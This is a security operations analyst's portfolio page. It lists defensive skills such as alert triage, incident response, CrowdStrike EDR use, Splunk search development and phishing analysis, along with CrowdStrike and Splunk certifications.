Site Under Construction — Full launch coming soon

Capabilities

Skills & Certifications

I specialize in security operations, incident response, threat hunting, and security monitoring across enterprise environments. My experience includes SIEM investigations, endpoint detection and response, email security analysis, vulnerability coordination, and clear communication with technical and non-technical stakeholders.

Core Security Operations Skills

Alert Triage & Investigation

Security Operations

Primary / Daily Use

Focus

Reviewing, prioritizing, and investigating security alerts across SIEM and EDR platforms to determine scope, severity, and required response actions.

Related Work

Alert queue management, false positive reduction, escalation workflows, shift handoff documentation.

Incident Response Coordination

Security Operations

Primary / Daily Use

Focus

Managing the incident lifecycle from initial detection through containment, eradication, recovery, and post-incident reporting.

Related Work

IR runbook execution, stakeholder notification, timeline construction, executive-level briefings.

Endpoint Detection & Response

EDR

Primary / Daily Use

Focus

Using CrowdStrike Falcon for endpoint visibility, threat hunting, process tree analysis, and response actions including host isolation and remediation.

Related Work

Suspicious process review, lateral movement detection, malware triage, CrowdStrike policy management.

Threat Hunting

Security Operations

Regular Use

Focus

Proactive hunting for indicators of compromise, attacker TTPs, and anomalous behavior patterns across endpoint and log data.

Related Work

IOC-based hunting, MITRE ATT&CK-aligned searches, behavioral baselining, hypothesis-driven investigations.

SIEM Search Development

SIEM & Log Analysis

Primary / Daily Use

Focus

Building and tuning detection logic, correlation searches, and investigation queries in Splunk to surface high-fidelity alerts and support active investigations.

Related Work

SPL query writing, dashboard creation, alert tuning, log source correlation.

Phishing & Email Security Analysis

Email Security

Primary / Daily Use

Focus

Investigating suspicious emails including header analysis, URL inspection, attachment review, and coordinating remediation across affected mailboxes.

Related Work

Header analysis, link detonation, mailbox sweeps, user notification, Sophos and O365 investigation.

Account Compromise Investigation

Identity & Access

Regular Use

Focus

Investigating suspected account takeovers through authentication log review, MFA analysis, session activity, and lateral movement indicators.

Related Work

Failed login analysis, impossible travel detection, O365 audit log review, credential reset coordination.

Malware & Suspicious Process Review

Endpoint

Regular Use

Focus

Analyzing suspicious executables, scripts, and processes using static analysis, sandbox results, and EDR telemetry.

Related Work

PowerShell detection, living-off-the-land technique review, VirusTotal analysis, CrowdStrike process trees.

Vulnerability & Exposure Review

Vulnerability Management

Supporting Role

Focus

Reviewing vulnerability scan results, prioritizing exposures by risk and asset criticality, and coordinating remediation with system owners.

Related Work

Scan result triage, CVSS scoring, patch coordination, exposure reporting.

Executive & Agency-Level Reporting

Communication

Primary / Daily Use

Focus

Translating technical security findings into clear, actionable reporting for leadership, agency stakeholders, and non-technical audiences.

Related Work

Incident summaries, situational awareness briefs, SOP documentation, playbook authoring.

Certifications

CrowdStrike CCFA

CrowdStrike

CrowdStrike CCFR

CrowdStrike

Splunk Core Certified Power User

Splunk

Professional Skills

Executive-level briefing Incident documentation Cross-team coordination Analyst mentorship Playbook development Threat briefing Root cause analysis Process improvement